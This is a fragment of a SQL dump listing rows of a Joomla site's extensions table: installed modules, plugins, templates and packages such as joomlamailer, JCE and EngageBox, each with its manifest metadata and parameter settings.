(10487, 0, 'MailChimp Stats', 'module', 'mod_mailchimpstats', '', 1, 1, 2, 0, '{\"name\":\"MailChimp Stats\",\"type\":\"module\",\"creationDate\":\"2014-08-16\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2014 freakedout - All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.1\",\"description\":\"This module shows a quick overview of your campaign statistics.\",\"group\":\"\",\"filename\":\"mod_mailchimpstats\"}', '{\"cache\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10488, 0, 'joomlamailer - com_content', 'plugin', 'com_content', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - com_content\",\"type\":\"plugin\",\"creationDate\":\"2015-08-16\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.2\",\"description\":\"Joomla core article integration for joomlamailer\",\"group\":\"\",\"filename\":\"com_content\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(10489, 0, 'joomlamailer - K2', 'plugin', 'com_k2', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - K2\",\"type\":\"plugin\",\"creationDate\":\"2015-01-24\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.1\",\"description\":\"K2 article integration for joomlamailer\",\"group\":\"\",\"filename\":\"com_k2\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 2, 0),
(10490, 0, 'joomlamailer - VirtueMart', 'plugin', 'com_virtuemart', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - VirtueMart\",\"type\":\"plugin\",\"creationDate\":\"2015-01-24\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.1\",\"description\":\"VirtueMart plugin for joomlamailer.\",\"group\":\"\",\"filename\":\"com_virtuemart\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 3, 0),
(10491, 0, 'joomlamailer - Table of content', 'plugin', 'table_of_content', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - Table of content\",\"type\":\"plugin\",\"creationDate\":\"2015-01-24\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.1\",\"description\":\"Create a table of included content articles in your joomlamailer newsletter.\",\"group\":\"\",\"filename\":\"table_of_content\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 4, 0),
(10492, 0, 'joomlamailer - Sidebar editor', 'plugin', 'sidebar_editor', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - Sidebar editor\",\"type\":\"plugin\",\"creationDate\":\"2014-10-04\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.1\",\"description\":\"Add a second WYSIWYG editor to the create newsletter interface.\",\"group\":\"\",\"filename\":\"sidebar_editor\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 5, 0),
(10493, 0, 'joomlamailer - Facebook icon', 'plugin', 'facebook_icon', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - Facebook icon\",\"type\":\"plugin\",\"creationDate\":\"2014-08-16\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.0\",\"description\":\"Facebook icon plugin for joomlamailer.\",\"group\":\"\",\"filename\":\"facebook_icon\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 6, 0),
(10494, 0, 'joomlamailer - Twitter icon', 'plugin', 'twitter_icon', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - Twitter icon\",\"type\":\"plugin\",\"creationDate\":\"2013-10-20\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2013 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.0\",\"description\":\"Twitter icon plugin for joomlamailer\",\"group\":\"\",\"filename\":\"twitter_icon\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 7, 0),
(10495, 0, 'joomlamailer - Instagram icon', 'plugin', 'instagram_icon', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - Instagram icon\",\"type\":\"plugin\",\"creationDate\":\"2015-05-02\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.0\",\"description\":\"Instagram icon plugin for joomlamailer.\",\"group\":\"\",\"filename\":\"instagram_icon\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 8, 0),
(10496, 0, 'joomlamailer - MySpace icon', 'plugin', 'myspace_icon', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - MySpace icon\",\"type\":\"plugin\",\"creationDate\":\"2013-11-02\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2013 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.0\",\"description\":\"MySpace icon plugin for joomlamailer.\",\"group\":\"\",\"filename\":\"myspace_icon\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 9, 0),
(10497, 0, 'joomlamailer - JomSocial discussions', 'plugin', 'jomsocial_discussions', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - JomSocial discussions\",\"type\":\"plugin\",\"creationDate\":\"2015-01-24\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.1\",\"description\":\"JomSocial discussions plugin for joomlamailer.\",\"group\":\"\",\"filename\":\"jomsocial_discussions\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 10, 0),
(10498, 0, 'joomlamailer - JomSocial profiles', 'plugin', 'jomsocial_profiles', 'joomlamailer', 0, 1, 1, 0, '{\"name\":\"joomlamailer - JomSocial profiles\",\"type\":\"plugin\",\"creationDate\":\"2015-01-24\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"1.1\",\"description\":\"JomSocial user profiles plugin for joomlamailer.\",\"group\":\"\",\"filename\":\"jomsocial_profiles\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 11, 0),
(10499, 0, 'Community - joomlamailer', 'plugin', 'joomlamailer', 'community', 0, 0, 1, 0, '{\"name\":\"Community - joomlamailer\",\"type\":\"plugin\",\"creationDate\":\"2014-08-23\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2014 freakedout. All rights reserved.\",\"authorEmail\":\"contact@freakedout.de\",\"authorUrl\":\"www.freakedout.de\",\"version\":\"1.0\",\"description\":\"This plugin updates the email address in MailChimp lists when changed by the user.\",\"group\":\"\",\"filename\":\"joomlamailer\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10500, 0, 'plg_installer_jeventsinstaller', 'plugin', 'jeventsinstaller', 'installer', 0, 1, 1, 0, '{\"name\":\"plg_installer_jeventsinstaller\",\"type\":\"plugin\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2016 GWE Systems Ltd. All rights reserved.\",\"authorEmail\":\"via website\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.48\",\"description\":\"PLG_INSTALLER_JEVENTSINSTALLER\",\"group\":\"\",\"filename\":\"jeventsinstaller\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10504, 0, 'COM_JLEXBLOCK', 'component', 'com_jlexblock', '', 1, 1, 0, 0, '{\"name\":\"COM_JLEXBLOCK\",\"type\":\"component\",\"creationDate\":\"December 17, 2016\",\"author\":\"JLexArt\",\"copyright\":\"Copyright (c) 2013-2016 JLexArt.com . All rights reserved.\\n\\t\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"5.1.2\",\"description\":\"\",\"group\":\"\",\"filename\":\"manifest\"}', '{\"loadjquerybackend\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10505, 0, 'System - JLexBlock', 'plugin', 'jlexblock', 'system', 0, 1, 1, 0, '{\"name\":\"System - JLexBlock\",\"type\":\"plugin\",\"creationDate\":\"Unknown\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"5.1.2\",\"description\":\"Plugin system\",\"group\":\"\",\"filename\":\"jlexblock\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10506, 0, 'Facebook Live Message', 'module', 'mod_facebook_live_message', '', 0, 1, 0, 0, '{\"name\":\"Facebook Live Message\",\"type\":\"module\",\"creationDate\":\"October 2015\",\"author\":\"Social Widgets\",\"copyright\":\"All rights reserved by Social Widgets\",\"authorEmail\":\"admin@socialwidgets.net\",\"authorUrl\":\"http:\\/\\/www.socialwidgets.net\",\"version\":\"1.0\",\"description\":\"Thanks for installing Facebook Live Message\",\"group\":\"\",\"filename\":\"mod_facebook_live_message\"}', '{\"facebook_name\":\"Facebook\",\"facebook_url\":\"https:\\/\\/www.facebook.com\\/facebook\",\"width\":\"500\",\"height\":\"300\",\"face\":\"false\",\"show_header\":\"false\",\"hide\":\"false\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10507, 0, 'Module - Facebook Comments By Internet Partner', 'module', 'mod_wsfbcom', '', 0, 1, 0, 0, '{\"name\":\"Module - Facebook Comments By Internet Partner\",\"type\":\"module\",\"creationDate\":\"Februar, 2012\",\"author\":\"InternetPartner.info\",\"copyright\":\"Copyright (C) 2011 InternetPartner.info All rights reserved.\",\"authorEmail\":\"office@internetiartner.info\",\"authorUrl\":\"http:\\/\\/internetpartner.info\\/en\\/\",\"version\":\"1.2\",\"description\":\"\\n\\t<h1>Facebook Comments By Internet Partner<\\/h1>\\n\\tTo allow Facebook Comments you dont need to do anything<br>\\n\\tIf you want to moderate your Facebook comments you will need Facebook API key.<br>\\n\\tIf you want to administrate your FB commnents insert facebook user id<br>\\n\\t<a href=\\\"http:\\/\\/internetpartner.info\\/en\\/\\\" target=\\\"_blank\\\" >More information on InternetPartner.info <\\/a> <br \\/>\\n\\t<img src=\'\\/modules\\/mod_wsfbcom\\/logo.png\' \\/><br \\/> <br \\/>  <br \\/>    \\n\\t\",\"group\":\"\",\"filename\":\"mod_wsfbcom\"}', '{\"data-num-posts\":\"4\",\"data-width\":\"500\",\"data-colorscheme\":\"\",\"appId\":\"\",\"adminID\":\"\",\"lang\":\"\",\"blockedIPs\":\"\",\"altMessage\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10509, 0, 'Facebook Comments By Internet Partner', 'package', 'pkg_fbcom', '', 0, 0, 1, 0, 'false', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10510, 0, 'Content - Facebook Comments By Internet Partner', 'plugin', 'wsfbcom', 'content', 0, 0, 1, 0, '{\"name\":\"Content - Facebook Comments By Internet Partner\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"InternetPartner.info\",\"copyright\":\"Copyright (C) 2011 Internet Partner Agency. All rights reserved.\",\"authorEmail\":\"office@internetiartner.info\",\"authorUrl\":\"http:\\/\\/internetpartner.info\\/en\\/\",\"version\":\"1.2\",\"description\":\"\\n\\t<h1>Facebook Comments By Internet Partner<\\/h1>\\n\\tTo allow Facebook Comments you dont need to do anything<br>\\n\\tIf you want to moderate your Facebook comments you will need Facebook API key.<br>\\n\\tIf you want to administrate your FB commnents insert facebook user id<br>\\n\\t<a href=\\\"http:\\/\\/internetpartner.info\\/en\\/\\\" target=\\\"_blank\\\" >More information on InternetPartner.info <\\/a> <br \\/>\\n\\t<img src=\'\\/plugins\\/content\\/wsfbcom\\/logo.png\' \\/><br \\/> <br \\/>  <br \\/>    \\n\\t\",\"group\":\"\",\"filename\":\"wsfbcom\"}', '{\"data-num-posts\":\"4\",\"data-width\":\"500\",\"data-colorscheme\":\"\",\"appId\":\"\",\"adminID\":\"\",\"lang\":\"\",\"excludeArticles\":\"\",\"excludeCats\":\"\",\"blockedIPs\":\"\",\"altMessage\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10512, 0, 'JEvents - Bootstrap Modal Library', 'library', 'jevmodal', '', 0, 1, 1, 0, '{\"name\":\"JEvents - Bootstrap Modal Library\",\"type\":\"library\",\"creationDate\":\"March 2017\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2015-2017 GWE Systems Ltd. All rights reserved.\",\"authorEmail\":\"via website\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.34\",\"description\":\"Bootstrap Modal Library for JEvents\",\"group\":\"\",\"filename\":\"jevmodal\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10513, 0, 'JEvents - Typeahead Library', 'library', 'jevtypeahead', '', 0, 1, 1, 0, '{\"name\":\"JEvents - Typeahead Library\",\"type\":\"library\",\"creationDate\":\"March 2017\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2015 GWE Systems Ltd. All rights reserved.\",\"authorEmail\":\"carcam@jevents.net\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.34\",\"description\":\"Typeahead Library for JEvents\",\"group\":\"\",\"filename\":\"jevtypeahead\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10514, 0, 'plg_system_popup_anywhere', 'plugin', 'popup_anywhere', 'system', 0, 0, 1, 0, '{\"name\":\"plg_system_popup_anywhere\",\"type\":\"plugin\",\"creationDate\":\"28th June 2011\",\"author\":\"codextension\",\"copyright\":\"Copyright (C) 2010-2011 codextension.com. All rights reserved.\",\"authorEmail\":\"contact@codextension.com\",\"authorUrl\":\"http:\\/\\/codextension.com\",\"version\":\"1.6.0\",\"description\":\"Shows a mootools popup window of an URL, image or even flash anywhere on your site.\",\"group\":\"\",\"filename\":\"popup_anywhere\"}', '{\"link\":\"\",\"insertid\":\"0\",\"image\":\"images\\/disclaimer1.jpg\",\"addarticle\":\"1\",\"enableNoConflict\":\"0\",\"popupwidth\":\"\",\"popupheight\":\"\",\"cookietime\":\"0\",\"type\":\"0\",\"template\":\"-1\",\"modaltype\":\"0\",\"closeafterseconds\":\"0\",\"linkofimage\":\"\",\"linktarget\":\"0\",\"cursor\":\"\",\"closebutton\":\"1\",\"scrollbar\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10529, 0, 'E4J Box Office', 'template', 'e4jboxoffice', '', 0, 1, 1, 0, '{\"name\":\"E4J Box Office\",\"type\":\"template\",\"creationDate\":\"January 2016\",\"author\":\"Valentina Arras - Extensions for joomla\",\"copyright\":\"Template Design \\u00a9 Joomla Templates Extensionsforjoomla. All rights reserved.\",\"authorEmail\":\"templates@extensionsforjoomla.com\",\"authorUrl\":\"http:\\/\\/www.extensionsforjoomla.com\",\"version\":\"1.1\",\"description\":\" <style type=\'text\\/css\'>\\n\\tdiv.btnposxml {float:left; width:200px; text-align:center; padding:10px; margin:0 15px 0 0; border-radius:#F80; border-radius:4px; -moz-border-radius:4px; -webkit-border-radius:4px; background:#f60;} \\n\\tdiv.btnposxml a {color:#fff;} \\n\\tdiv.btnvarxml {float:left; width:250px; text-align:center; padding:10px; border-radius:#273969; border-radius:4px; -moz-border-radius:4px; -webkit-border-radius:4px; background:#304680;} \\n\\tdiv.btnvarxml a {color:#fff;}\\n\\tspan.mod-desc {line-height:2em;}\\n\\t.pane-sliders .panel {border:0;} \\n\\tdiv.panel h3.pane-toggler-down, div.panel h3.pane-toggler {padding:10px; color:#999900; border-top-left-radius:4px; border-top-right-radius:4px; -moz-border-top-left-radius:4px; -moz-border-top-right-radius:4px; -webkit-border-top-left-radius:4px; -webkit-border-top-right-radius:4px; background:#f6f6f6; border:1px solid #ccc;  border-top:2px solid #99CC00;} \\n\\tdiv.pane-slider.pane-down {border:1px solid #ccc; border-top:0;}\\n\\tdiv.pane-slider ul.adminformlist li {border-bottom: 1px solid #EEEEEE; margin: 0; overflow: hidden; padding: 5px 5px;}\\n\\tdiv.pane-slider ul.adminformlist li > label { height:20px; line-height:24px; margin: 0 10px 0 0; text-align:right;padding:10px 0px;}\\n\\tdiv.pane-slider ul.adminformlist input, div.pane-slider ul.adminformlist select {padding:3px 5px; height:24px; line-height:24px; border-radius:2px; -moz-border-radius:2px; -webkit-border-radius:2px;}\\n\\t.bt-doc { text-transform:uppercase; border-radius:2px; -moz-border-radius:2px; -webkit-border-radius:2px; color:#fff; padding:8px 20px; font-size:14px; background:#999900; display:inline-block; text-align:center; float:none; clear:both; margin:10px 0 0 0; }\\n\\t.bt-doc:hover {text-decoration:none; color:#fff; background:#666600;}\\n\\th1.maintit-e4jadmin {color:#999900; font-size:20px; border-bottom:1px solid #ddd; margin:0 0 15px; padding:0 0 5px;}\\n\\tp.desc-featured {font-weight:bold;font-size:14px; line-height:2em;}\\n\\th3.readdoc {margin:0; padding:0; border-top:1px solid #ddd; margin:15px 0 10px; padding:15px 0 0 0;}\\n\\t.mod-bg-container {background:#f6f6f6; padding:20px; border:1px solid #e7e7e7;}\\n\\t#jform_params_Header01-lbl {font-size:18px; text-transform:uppercase; font-weight:500;}\\n\\t<\\/style>\\n\\t<div class=\\\"mod-bg-container\\\">\\n\\t<p>Template E4J Box Office, created by e4j... and designed for the component VikEvents.<br \\/><\\/p>\\n\\t<h1 class=\\\"maintit-e4jadmin\\\">Getting Started<\\/h1>\\n\\t<p class=\\\"desc-featured\\\">1. Set the template as Default<br \\/>\\n\\t2. Set your logo <br \\/>\\n\\t3. Choose your color layout<\\/p>\\n\\t<h3 class=\\\"readdoc\\\">CHECK THE DOCUMENTATION<\\/h3>\\n\\t<span>Download and Read the documentation of the template.<\\/span>\\n\\t<div><a class=\\\"bt-doc\\\" href=\\\"http:\\/\\/www.extensionsforjoomla.com\\/documentations\\/template-boxoffice\\\" target=\\\"_blank\\\">Read the Documentation<\\/a><\\/div>\\n\\t<\\/div>\\t\\n\\t\\n\\t\",\"group\":\"\",\"filename\":\"templateDetails\"}', '{\"Header01\":\"Template Layout\",\"tcolour\":\"0\",\"getmenufixed\":\"0\",\"logolink\":\"\",\"headertxt\":\"24px\",\"bodytxt\":\"16px\",\"bfont\":\"latoregularbd\",\"hfont\":\"latoregular\",\"responsive\":\"0\",\"config\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10530, 0, 'lighthouse_j3', 'template', 'lighthouse_j3', '', 0, 1, 1, 0, '{\"name\":\"lighthouse_j3\",\"type\":\"template\",\"creationDate\":\"October 2012\",\"author\":\"arrowthemes\",\"copyright\":\"Copyright (C) arrowthemes\",\"authorEmail\":\"support@arrowthemes.com\",\"authorUrl\":\"https:\\/\\/arrowthemes.com\",\"version\":\"2.6.0\",\"description\":\"Lighthouse is an intuitive church\\/non-profit organization Joomla Template built on Warp Framework and Uikit.\",\"group\":\"\",\"filename\":\"templateDetails\"}', '{\"config\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10531, 10538, 'COM_JCE', 'component', 'com_jce', '', 1, 1, 0, 0, '{\"name\":\"COM_JCE\",\"type\":\"component\",\"creationDate\":\"19-12-2018\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2018 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"www.joomlacontenteditor.net\",\"version\":\"2.6.35\",\"description\":\"COM_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10532, 10538, 'plg_editors_jce', 'plugin', 'jce', 'editors', 0, 1, 1, 0, '{\"name\":\"plg_editors_jce\",\"type\":\"plugin\",\"creationDate\":\"19-12-2018\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2018 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.6.35\",\"description\":\"WF_EDITOR_PLUGIN_DESC\",\"group\":\"\",\"filename\":\"jce\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10533, 10538, 'plg_content_jce', 'plugin', 'jce', 'content', 0, 1, 1, 0, '{\"name\":\"plg_content_jce\",\"type\":\"plugin\",\"creationDate\":\"19-12-2018\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2018 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.6.35\",\"description\":\"PLG_CONTENT_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10534, 10538, 'plg_extension_jce', 'plugin', 'jce', 'extension', 0, 1, 1, 0, '{\"name\":\"plg_extension_jce\",\"type\":\"plugin\",\"creationDate\":\"19-12-2018\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2018 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.6.35\",\"description\":\"PLG_EXTENSION_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10535, 10538, 'plg_installer_jce', 'plugin', 'jce', 'installer', 0, 1, 1, 0, '{\"name\":\"plg_installer_jce\",\"type\":\"plugin\",\"creationDate\":\"19-12-2018\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2018 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.6.35\",\"description\":\"PLG_INSTALLER_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10536, 10538, 'plg_quickicon_jce', 'plugin', 'jce', 'quickicon', 0, 1, 1, 0, '{\"name\":\"plg_quickicon_jce\",\"type\":\"plugin\",\"creationDate\":\"19-12-2018\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2018 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.6.35\",\"description\":\"PLG_QUICKICON_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10537, 10538, 'plg_system_jce', 'plugin', 'jce', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_jce\",\"type\":\"plugin\",\"creationDate\":\"19-12-2018\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2018 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.6.35\",\"description\":\"PLG_SYSTEM_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10538, 0, 'PKG_JCE', 'package', 'pkg_jce', '', 0, 1, 1, 0, '{\"name\":\"PKG_JCE\",\"type\":\"package\",\"creationDate\":\"19-12-2018\",\"author\":\"Ryan Demmer\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"2.6.35\",\"description\":\"PKG_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pkg_jce\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10539, 0, 'System - Nice Google Analytics', 'plugin', 'nicegoogleanalytics', 'system', 0, 1, 1, 0, '{\"name\":\"System - Nice Google Analytics\",\"type\":\"plugin\",\"creationDate\":\"February 21, 2013\",\"author\":\"Michael Babcock\",\"copyright\":\"Copyright (C) 2012-2013 TriniTronic. All Rights Reserved.\",\"authorEmail\":\"info@trinitronic.com\",\"authorUrl\":\"trinitronic.com\",\"version\":\"1.01\",\"description\":\"Nice Google Analytics provides site wide Google Analytic integration.\",\"group\":\"\",\"filename\":\"nicegoogleanalytics\"}', '{\"googletrackingid\":\"UA-25785635-1\",\"siteurl\":\"https:\\/\\/www.lifeoasisinternationalchurch.org\",\"googletrackingtype\":\"1\",\"googleanalytics_kludge\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10540, 0, 'Sj Newsletter Popup', 'module', 'mod_sj_newsletter_popup', '', 0, 1, 0, 0, '{\"name\":\"Sj Newsletter Popup\",\"type\":\"module\",\"creationDate\":\"January 2016\",\"author\":\"YouTech Company\",\"copyright\":\"Copyright (c) 2009-2012 YouTech Company\",\"authorEmail\":\"contact@ytcvn.com\",\"authorUrl\":\"http:\\/\\/www.smartaddons.com\",\"version\":\"1.0.0\",\"description\":\"TPL_YTFRAMEWORK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sj_newsletter_popup\"}', '{\"expired\":\"1\",\"width\":\"40%\",\"image_bg_display\":\"0\",\"color_bg\":\"#fff\",\"title_display\":\"0\",\"title\":\"\",\"moduleclass_sfx\":\"\",\"layout\":\"basic\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10541, 0, 'com_sj_newsletter', 'component', 'com_sj_newsletter', '', 1, 1, 0, 0, '{\"name\":\"com_sj_newsletter\",\"type\":\"component\",\"creationDate\":\"Januarry 2016\",\"author\":\"YouTech Company\",\"copyright\":\"Copyright (c) 2016 YouTech Company\",\"authorEmail\":\"contact@ytcvn.com\",\"authorUrl\":\"http:\\/\\/www.smartaddons.com\",\"version\":\"1.0.0\",\"description\":\"subscribe to receive update from us\",\"group\":\"\",\"filename\":\"sj_newsletter\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10543, 0, 'plg_system_nrframework', 'plugin', 'nrframework', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_nrframework\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2018 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"4.1.3\",\"description\":\"PLG_SYSTEM_NRFRAMEWORK_DESC\",\"group\":\"\",\"filename\":\"nrframework\"}', '{\"key\":\"ace5ce174390a9e1bbdb8dfb5c836224\",\"gmapkey\":\"\"}', '', '', 196, '2018-07-24 20:43:00', 0, 0),
(10544, 0, 'COM_RSTBOX', 'component', 'com_rstbox', '', 1, 1, 0, 0, '{\"name\":\"COM_RSTBOX\",\"type\":\"component\",\"creationDate\":\"August 2014\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2018 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"3.4.7\",\"description\":\"COM_RSTBOX_DESC\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10545, 0, 'PLG_EDITORS-XTD_ENGAGEBOX', 'plugin', 'engagebox', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"PLG_EDITORS-XTD_ENGAGEBOX\",\"type\":\"plugin\",\"creationDate\":\"November 2016\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2016 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_EDITORS-XTD_ENGAGEBOX_DESC\",\"group\":\"\",\"filename\":\"engagebox\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10546, 0, 'PLG_ENGAGEBOX_CUSTOM', 'plugin', 'custom', 'engagebox', 0, 1, 1, 0, '{\"name\":\"PLG_ENGAGEBOX_CUSTOM\",\"type\":\"plugin\",\"creationDate\":\"January 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright (c) 2018 Tassos Marinos\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_ENGAGEBOX_CUSTOM_DESC\",\"group\":\"\",\"filename\":\"custom\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
